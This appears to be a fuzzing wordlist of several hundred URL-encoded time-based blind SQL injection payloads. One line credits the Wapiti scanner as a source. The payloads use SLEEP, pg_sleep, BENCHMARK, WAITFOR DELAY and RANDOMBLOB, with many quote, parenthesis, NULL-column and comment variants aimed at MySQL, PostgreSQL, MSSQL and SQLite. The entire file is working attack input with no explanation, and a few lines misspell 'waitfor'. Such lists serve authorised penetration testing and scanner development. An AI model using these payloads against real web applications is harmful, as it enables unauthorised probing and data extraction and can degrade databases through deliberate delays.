%20and%200%3Dbenchmark(3000000,MD5(1))%20--
'%20and%200%3Dbenchmark(3000000,MD5(1))%20--
%20and%200%3Dbenchmark(3000000,MD5(1))%20%23
'%20and%200%3Dbenchmark(3000000,MD5(1))%20%23
%20and%200%3Dbenchmark(3000000,MD5(1))%20/*
'%20and%200%3Dbenchmark(3000000,MD5(1))%20/*
'%20AnD%20SLEEP(5)%20ANd%20'1
'%20or%20benchmark(10000000,MD5(1))%23
'%20or%20pg_sleep(5)--
'%20or%20sleep(5)%23
'%20or%20sleep(5)%3D'
%20waitfor%20delay%20'0:0:20'%20--
'%20waitfor%20delay%20'0:0:20'%20--
%20waitfor%20delay%20'0:0:20'%20/*%20
'%20waitfor%20delay%20'0:0:20'%20/*%20
"%20and%200%3Dbenchmark(3000000,MD5(1))%20--
"%20and%200%3Dbenchmark(3000000,MD5(1))%20%23
"%20and%200%3Dbenchmark(3000000,MD5(1))%20/*
"%20or%20benchmark(10000000,MD5(1))%23
"%20or%20pg_sleep(5)--
"%20or%20sleep(5)%23
"%20or%20sleep(5)%3D"
"%20waitfor%20delay%20'0:0:20'%20--
"%20waitfor%20delay%20'0:0:20'%20/*%20
")%20and%200%3Dbenchmark(3000000,MD5(1))%20--
")%20and%200%3Dbenchmark(3000000,MD5(1))%20%23
")%20and%200%3Dbenchmark(3000000,MD5(1))%20/*
")%20or%20benchmark(10000000,MD5(1))%23
")%20or%20pg_sleep(5)--
")%20or%20sleep(5)%3D"
")%20waitfor%20delay%20'0:0:20'%20--
")%20waitfor%20delay%20'0:0:20'%20/*%20
")%20waitfor%20delay%20'0:0:20'%20--
")%20waitfor%20delay%20'0:0:20'%20/*
"))%20and%200%3Dbenchmark(3000000,MD5(1))%20--
"))%20and%200%3Dbenchmark(3000000,MD5(1))%20%23
"))%20and%200%3Dbenchmark(3000000,MD5(1))%20/*
"))%20or%20benchmark(10000000,MD5(1))%23
"))%20or%20pg_sleep(5)--
"))%20or%20sleep(5)%3D"
"))%20waitfor%20delay%20'0:0:20'%20--
"))%20waitfor%20delay%20'0:0:20'%20/*%20
"))%20waitfor%20delay%20'0:0:20'%20--
"))%20waitfor%20delay%20'0:0:20'%20/*
")))%20and%200%3Dbenchmark(3000000,MD5(1))%20--
")))%20and%200%3Dbenchmark(3000000,MD5(1))%20%23
")))%20and%200%3Dbenchmark(3000000,MD5(1))%20/*
")))%20waitfor%20delay%20'0:0:20'%20--
")))%20waitfor%20delay%20'0:0:20'%20/*%20
"))))%20and%200%3Dbenchmark(3000000,MD5(1))%20--
"))))%20and%200%3Dbenchmark(3000000,MD5(1))%20%23
"))))%20and%200%3Dbenchmark(3000000,MD5(1))%20/*
"))))%20waitfor%20delay%20'0:0:20'%20--
"))))%20waitfor%20delay%20'0:0:20'%20/*%20
")))))%20waitfor%20delay%20'0:0:20'%20--
")))))%20waitfor%20delay%20'0:0:20'%20/*%20
"))))))%20waitfor%20delay%20'0:0:20'%20--
"))))))%20waitfor%20delay%20'0:0:20'%20/*%20
"));waitfor%20delay%20'0:0:5'--
"))||pg_sleep(5)--
"),(select%20if(count(*)!%3D-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
"),(select%20if(count(*)!%3D-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
"),(select%20if(count(*)!%3D-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
"),NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
");waitfor%20delay%20'0:0:5'--
")||pg_sleep(5)--
",(select%20if(count(*)!%3D-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
",(select%20if(count(*)!%3D-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
",(select%20if(count(*)!%3D-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
",NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
";waitfor%20delay%20'0:0:5'--
"||pg_sleep(5)--
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL))%20--
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*%20
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
%23%20from%20wapiti
%26%26SLEEP(5)
%26%26SLEEP(5)--
%26%26SLEEP(5)%23
'%26%26SLEEP(5)%26%26'1
(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))ecMj)
(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))ecMj)--
(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))ecMj)%23
)%20and%200%3Dbenchmark(3000000,MD5(1))%20--
')%20and%200%3Dbenchmark(3000000,MD5(1))%20--
)%20and%200%3Dbenchmark(3000000,MD5(1))%20%23
')%20and%200%3Dbenchmark(3000000,MD5(1))%20%23
)%20and%200%3Dbenchmark(3000000,MD5(1))%20/*
')%20and%200%3Dbenchmark(3000000,MD5(1))%20/*
')%20or%20benchmark(10000000,MD5(1))%23
')%20or%20pg_sleep(5)--
')%20or%20sleep(5)%3D'
)%20waitfor%20delay%20'0:0:20'%20--
')%20waitfor%20delay%20'0:0:20'%20--
)%20waitfor%20delay%20'0:0:20'%20/*%20
')%20waitfor%20delay%20'0:0:20'%20/*%20
)%20waitfor%20delay%20'0:0:20'%20--
')%20waitfor%20delay%20'0:0:20'%20--
)%20waitfor%20delay%20'0:0:20'%20/*
')%20waitfor%20delay%20'0:0:20'%20/*
))%20and%200%3Dbenchmark(3000000,MD5(1))%20--
'))%20and%200%3Dbenchmark(3000000,MD5(1))%20--
))%20and%200%3Dbenchmark(3000000,MD5(1))%20%23
'))%20and%200%3Dbenchmark(3000000,MD5(1))%20%23
))%20and%200%3Dbenchmark(3000000,MD5(1))%20/*
'))%20and%200%3Dbenchmark(3000000,MD5(1))%20/*
'))%20or%20benchmark(10000000,MD5(1))%23
'))%20or%20pg_sleep(5)--
'))%20or%20sleep(5)%3D'
))%20waitfor%20delay%20'0:0:20'%20--
'))%20waitfor%20delay%20'0:0:20'%20--
))%20waitfor%20delay%20'0:0:20'%20/*%20
'))%20waitfor%20delay%20'0:0:20'%20/*%20
))%20waitfor%20delay%20'0:0:20'%20--
'))%20waitfor%20delay%20'0:0:20'%20--
))%20waitfor%20delay%20'0:0:20'%20/*
'))%20waitfor%20delay%20'0:0:20'%20/*
)))%20and%200%3Dbenchmark(3000000,MD5(1))%20--
')))%20and%200%3Dbenchmark(3000000,MD5(1))%20--
)))%20and%200%3Dbenchmark(3000000,MD5(1))%20%23
')))%20and%200%3Dbenchmark(3000000,MD5(1))%20%23
)))%20and%200%3Dbenchmark(3000000,MD5(1))%20/*
')))%20and%200%3Dbenchmark(3000000,MD5(1))%20/*
)))%20waitfor%20delay%20'0:0:20'%20--
')))%20waitfor%20delay%20'0:0:20'%20--
)))%20waitfor%20delay%20'0:0:20'%20/*%20
')))%20waitfor%20delay%20'0:0:20'%20/*%20
))))%20and%200%3Dbenchmark(3000000,MD5(1))%20--
'))))%20and%200%3Dbenchmark(3000000,MD5(1))%20--
))))%20and%200%3Dbenchmark(3000000,MD5(1))%20%23
'))))%20and%200%3Dbenchmark(3000000,MD5(1))%20%23
))))%20and%200%3Dbenchmark(3000000,MD5(1))%20/*
'))))%20and%200%3Dbenchmark(3000000,MD5(1))%20/*
))))%20waitfor%20delay%20'0:0:20'%20--
'))))%20waitfor%20delay%20'0:0:20'%20--
))))%20waitfor%20delay%20'0:0:20'%20/*%20
'))))%20waitfor%20delay%20'0:0:20'%20/*%20
)))))%20waitfor%20delay%20'0:0:20'%20--
')))))%20waitfor%20delay%20'0:0:20'%20--
')))))%20waitfor%20delay%20'0:0:20'%20/*%20
))))))%20waitfor%20delay%20'0:0:20'%20--
'))))))%20waitfor%20delay%20'0:0:20'%20--
'))))))%20waitfor%20delay%20'0:0:20'%20/*%20
));waitfor%20delay%20'0:0:5'--
'));waitfor%20delay%20'0:0:5'--
'))||pg_sleep(5)--
),(select%20if(count(*)!%3D-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
'),(select%20if(count(*)!%3D-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
),(select%20if(count(*)!%3D-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
'),(select%20if(count(*)!%3D-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
),(select%20if(count(*)!%3D-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
'),(select%20if(count(*)!%3D-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
'),NULL)%20waifor%20delay%20'0:0:20'%20/*
),NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
);waitfor%20delay%20'0:0:5'--
');waitfor%20delay%20'0:0:5'--
')||pg_sleep(5)--
,(select%20if(count(*)!%3D-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
',(select%20if(count(*)!%3D-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
,(select%20if(count(*)!%3D-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
',(select%20if(count(*)!%3D-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
,(select%20if(count(*)!%3D-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
',(select%20if(count(*)!%3D-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
',NULL)%20waifor%20delay%20'0:0:20'%20/*
,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
;waitfor%20delay%20'0:0:5'--
';waitfor%20delay%20'0:0:5'--
'\"
||pg_sleep(5)--
'||pg_sleep(5)--
%2B%20SLEEP(10)%20%2B%20'
%2Bbenchmark(3200,SHA1(1))%2B'
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL))%20--
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL))%20--
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*%20
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*%20
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'%2Bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
1%20or%20benchmark(10000000,MD5(1))%23
1%20or%20pg_sleep(5)--
1%20or%20sleep(5)%23
1)%20or%20benchmark(10000000,MD5(1))%23
1)%20or%20pg_sleep(5)--
1)%20or%20sleep(5)%23
1))%20or%20benchmark(10000000,MD5(1))%23
1))%20or%20pg_sleep(5)--
1))%20or%20sleep(5)%23
1))||pg_sleep(5)--
1)||pg_sleep(5)--
1||pg_sleep(5)--
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'vRxe'%3D'vRxe
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))nQIP)
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))nQIP)--
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))nQIP)%23
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))YjoC)%20AND%20'%'%3D'
AND%202947%3DLIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
AND%202947%3DLIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
AnD%20SLEEP(5)
AnD%20SLEEP(5)--
AnD%20SLEEP(5)%23
benchmark(10000000,MD5(1))%23
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))%23
OR%202947%3DLIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR%202947%3DLIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
or%20benchmark(50000000,MD5(1))
or%20benchmark(50000000,MD5(1))--
or%20benchmark(50000000,MD5(1))%23
or%20pg_SLEEP(5)
or%20pg_SLEEP(5)--
or%20pg_SLEEP(5)%23
or%20SLEEP(5)
or%20SLEEP(5)--
or%20SLEEP(5)%23
or%20SLEEP(5)%3D'
or%20SLEEP(5)%3D"
ORDER%20BY%20SLEEP(5)
ORDER%20BY%20SLEEP(5)--
ORDER%20BY%20SLEEP(5)%23
pg_SLEEP(5)
pg_sleep(5)--
pg_SLEEP(5)%23
RANDOMBLOB(1000000000/2)
RANDOMBLOB(500000000/2)
SLEEP(1)/*'%20or%20SLEEP(1)%20or%20'"%20or%20SLEEP(1)%20or%20"*/
SLEEP(5)--
sleep(5)%23
SLEEP(5)%3D'
SLEEP(5)%3D"
waitfor%20delay%20'00:00:05'
waitfor%20delay%20'00:00:05'--
waitfor%20delay%20'00:00:05'%23
